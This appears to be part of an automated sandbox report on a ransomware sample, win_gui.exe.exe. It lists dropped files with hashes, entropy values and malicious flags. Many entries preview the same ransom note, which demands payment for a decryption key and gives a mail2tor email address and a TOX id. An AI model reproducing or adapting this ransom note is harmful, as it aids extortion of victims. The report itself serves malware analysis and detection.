                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:true
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):576
                                Entropy (8bit):7.470774830722899
                                Encrypted:false
                                SSDEEP:12:/sYCWw14eNR1PcrSOGJ9fuyAWKj0hOJNuauDZMK5mg/2lWOZOs9p:/z/wpDyYPGTNj0hOHAVMJg6WXs9p
                                MD5:75DBE1EA85A5B9E2CE02702E4C04A047
                                SHA1:F7DB99F6E1076B71A6F5ADBCA2A4B066161D8D0B
                                SHA-256:DEF0CA6FECE56C6B184C1C97E15E78D6E7C11446D7583986EE490D40CF7711B4
                                SHA-512:B6B600A74FCA5592B1BDB0368BE116FFE2443FB93B2961AC3FA45C9B90E3EAC6B2C4BCBDBD1DCC94AFBB8B0CD5D29CC290052026BA33AC22A59AFC1E7FF52D46
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.882742702467496
                                Encrypted:false
                                SSDEEP:48:LaNixTnN201Sp0dH1GXqnRI/WyYu+MAVMJg6TC:meN20A+rGXSRIevuAVOC
                                MD5:54D778A5396A1063CB4A5FB9A4194275
                                SHA1:5E843ECE4D18C7D3F8A584F93A0A2DA926BC131C
                                SHA-256:B245928E765DD8D03DE6CED8C7AE16F3C653DF576B4D7E553E35873E1FAB36C4
                                SHA-512:AA8B0C9CC6BA6E75D0284A174D8111BF722B1EB4CC8733A15DFD3B4539D3A2B5C716E6843BD10638A377591231A4D2BBC0AE4E268BBC6B59D91D72BCE61CB937
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.866580644871835
                                Encrypted:false
                                SSDEEP:48:/pOmH7fp+gSGg5T3/g/WyYu+MAVMJg6TdC:/phHDp+BGyT3/gevuAVOdC
                                MD5:65B06AE2C850315249800BF64DD00670
                                SHA1:D3FACEF2A8DD19CB53EF5D87F48AC74036CC3386
                                SHA-256:002CEAB60C9374A9968C83981B9BFB8AF186DB07EDC8EE5C74915367B9E11272
                                SHA-512:31FEEBCF4504F9AF24CE95C9C75E85F8F942C8CB9D889E6A0B86A0F3C41C92890201552DBAF1CD2CF0E1453ECE078E6DC6861BFDA1CA98B8D4B20CE3F5F46889
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.852259477161106
                                Encrypted:false
                                SSDEEP:48:pJJJLDKqjkD0OhASvQkohzsFBNeQ/WyYu+MAVMJg6Tm:pJzuqg0LLKDevuAVOm
                                MD5:DCEC546C6F67DD35375070C63CCFC1AB
                                SHA1:148D03D5209927463907AB9C6B4E26254A9D6EB5
                                SHA-256:A225D86679883D09F5551B92B6B3ACBA53EFD59C830879D8311C43FEA32B00FD
                                SHA-512:6A0FF1B3C2B5EA74D2F5C05CAC45D497A52A66ED8AD313D312F734A151F9891B8D52553FA6F8474E457EAA4633D237DDB667D8746418455272158CF722E2AD16
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.855462544588671
                                Encrypted:false
                                SSDEEP:48:FVFQlXzQ3b/WGNJZu5c7z/WyYu+MAVMJg6TD6L2:KDQ3jdNXuC7zevuAVODV
                                MD5:6FC9CF5122E43033CA6911FEEC602027
                                SHA1:EDA42F4E1FB1F5CC9D87F61D3AE9C1E5941844EF
                                SHA-256:E08CC73D3CB7E7B5F4C6F70E897B3AD290AD927AA1BFE0A9AC03FEFF2FDA37B2
                                SHA-512:BE72786A087187DD286DC7F3968D0343FB8DC4559020A4729B35D505E78C662BEA81583AF24052F4973871FBDEB59E3F8F9C4FFA90DAFF88F94AAE0D89504906
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.878010680561289
                                Encrypted:false
                                SSDEEP:48:8+hUM22e5PKDqOF4lviahJysvDZ/WyYu+MAVMJg6TO:8+ha2nqRlXhJbv9evuAVOO
                                MD5:D9A6088E5B1536691AAC7A0D51FD47DB
                                SHA1:4B3B5F1357A4D0378D625C530333C794E7912ED3
                                SHA-256:99D1E487CD6BEB45E3AFA254655603ECF16CABF122D0A1ADE8A03A202ECA5C1B
                                SHA-512:96B1481A7F2E62341D28AF5D316D62854288CBA8DADEADB2EE9BBB8A6AAD7A10E8EF2878F0E922E5DF5691E035E81EC41DAF4D1521E576AF196CFF23628300A8
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.866989580192017
                                Encrypted:false
                                SSDEEP:48:/pkHUUkJHoyyBH8BgHBkP/WyYu+MAVMJg6T0yk:/nxXyBcBgHCPevuAVOZk
                                MD5:BC649D68CAE9B82B7B27959B1134153F
                                SHA1:49D842817156F4BB5BC34519B0235F31E8C42E3F
                                SHA-256:69AB922269B75628BC6374A8320064DDA057E8209028DD209E6CE2245838BAA1
                                SHA-512:95EC3246B7862EB748FBE163BE1BB806B07E2808067B7D9D8893F6A1D0ED0F1F74D34A244834810FFEF9E627681AB4D501C2939C1F6629D1C6010A426F82B971
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.866989580192017
                                Encrypted:false
                                SSDEEP:48:/pkHUUkJHoyyBH8BgHBkP/WyYu+MAVMJg6T0yk:/nxXyBcBgHCPevuAVOZk
                                MD5:BC649D68CAE9B82B7B27959B1134153F
                                SHA1:49D842817156F4BB5BC34519B0235F31E8C42E3F
                                SHA-256:69AB922269B75628BC6374A8320064DDA057E8209028DD209E6CE2245838BAA1
                                SHA-512:95EC3246B7862EB748FBE163BE1BB806B07E2808067B7D9D8893F6A1D0ED0F1F74D34A244834810FFEF9E627681AB4D501C2939C1F6629D1C6010A426F82B971
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.867104493461105
                                Encrypted:false
                                SSDEEP:48:CI3hOcgqOIxnkXcvkhHNPd67jZ/WyYu+MAVMJg6T9:B3hvgqOIxnjvM67jZevuAVO9
                                MD5:16404155B593D22D2821828127D14F3D
                                SHA1:52ADEB9C793A6F31686F4A6AC4D4361DA93D4B75
                                SHA-256:270F05A0B45BDB18D11BFB0407AC9126ADCEB113287A231FFDB4490CB56EF9A9
                                SHA-512:AB7AF397AB874EDF8E775A283B0103B5A9AA142D8C83DF946080F01C323D7961A9A399DB195137280AEB20C6805CE26B45F0A41909750FC2F8228E5B6527351E
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.866722339297308
                                Encrypted:false
                                SSDEEP:48:/q1l96hBm6CeMZGVS9SI2s8shk/WyYu+MAVMJg6Tba:/qF6hBzCuVS9Sla+evuAVOe
                                MD5:1231713E44AE49AE247BE998B295E7CE
                                SHA1:58F7C49A280A3C311C2477876617F6E5F15D5773
                                SHA-256:D1FA83DFFB0C416793E1A173CE958C2E64C6C874731ECC3F8570C09D23F4FDBA
                                SHA-512:EF1AD4B93EB287E0355513EEA0C5F1250F55995CD1C157AE97219500CCD3E66D4B72CA6039E8B6445D280A584EE320C7A30F9DEA7CF6C1587872C460773EE406
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.878426947338794
                                Encrypted:false
                                SSDEEP:48:lmZSG0KG/2kxWpymU9/WyYu+MAVMJg6Tfu:lmZSG0KSxAymU9evuAVOfu
                                MD5:77F327C2574B2648D1830603801902DD
                                SHA1:9740651C724421C5834CE3DDE0A0379C3C792B20
                                SHA-256:79465EE6E1625AD23BBDF852CC0FBEA1E6E3F6DA6157BBA3EA0A5631003BA0DE
                                SHA-512:59B3EE2291322A90999785032045612E015286899B5EA4777FB86E7AFF65F9DBD05989C4BF3BFB0DEB339A2FE22DD658EA5CB55541836845B8BE3E6160C1A029
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.878426947338794
                                Encrypted:false
                                SSDEEP:48:lmZSG0KG/2kxWpymU9/WyYu+MAVMJg6Tfu:lmZSG0KSxAymU9evuAVOfu
                                MD5:77F327C2574B2648D1830603801902DD
                                SHA1:9740651C724421C5834CE3DDE0A0379C3C792B20
                                SHA-256:79465EE6E1625AD23BBDF852CC0FBEA1E6E3F6DA6157BBA3EA0A5631003BA0DE
                                SHA-512:59B3EE2291322A90999785032045612E015286899B5EA4777FB86E7AFF65F9DBD05989C4BF3BFB0DEB339A2FE22DD658EA5CB55541836845B8BE3E6160C1A029
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.86726853483015
                                Encrypted:false
                                SSDEEP:48:UHDRpiXpwznTlkWE+VS/WyYu+MAVMJg6T4:UHDRpL62SevuAVO4
